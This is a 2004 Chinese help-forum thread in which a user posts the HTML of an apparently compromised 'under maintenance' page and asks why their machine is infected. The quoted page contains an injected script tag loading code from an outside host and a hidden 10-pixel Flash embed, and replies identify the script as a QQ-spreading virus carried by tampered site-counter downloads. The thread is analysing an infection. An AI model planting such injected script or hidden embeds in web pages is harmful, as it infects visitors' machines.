<HTML>
<HTML>
<HEAD>
<TITLE>网站建设中</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<BODY>
系统维修,请稍候访问... ...
<script src="http://www.mydj2005.com/js/ajcount.asp?style="></script>
</center>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="10" height="10">
<param name="movie" value="go.swf">
<param name="quality" value="high">
<embed src="go.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="10" height="10"></embed>
</object>
</BODY>
</HTML>
帮忙分析一下,我机种毒了
问题点数:0、回复次数:7Top
1 楼dragonhell(冷箫吟)回复于 2004-12-01 19:41:13 得分 0
<script src="http://www.mydj2005.com/js/ajcount.asp?style="></script>
问题在这吧???Top
2 楼laumo(老莫)回复于 2004-12-01 21:10:18 得分 0
同楼上的,唯一可疑的代码。Top
3 楼liuxiaoyi666(MSMVP 小猪妹荣誉马甲之八卦兔子)回复于 2004-12-01 22:35:40 得分 0
<script src="http://www.mydj2005.com/js/ajcount.asp?style="></script>
这个是病毒,我刚看过的,我同学中病毒了*^_^*Top
4 楼liuxiaoyi666(MSMVP 小猪妹荣誉马甲之八卦兔子)回复于 2004-12-01 22:36:13 得分 0
QQ病毒,不停的发短消息,我看着不对没打开那个网页Top
5 楼server_me(编程浪子)回复于 2004-12-02 09:45:18 得分 0
哈~哥们,杀毒吧~~Top
6 楼flybird66(咖啡猫 QQ:13170934)回复于 2004-12-02 09:59:29 得分 0
呵,他肯定是用了阿江V2。0以上版本的站内统计了,如果是在网上下的话,一般记数文件和其它几个文件会有一个iframe的代码,直接指的就是一个病毒的网页。Top
7 楼godfather1hp(√Semper Fi ヤ卐嫚,咱们两个造小人吧?卍メ)回复于 2004-12-02 13:12:54 得分 0
杀毒Top




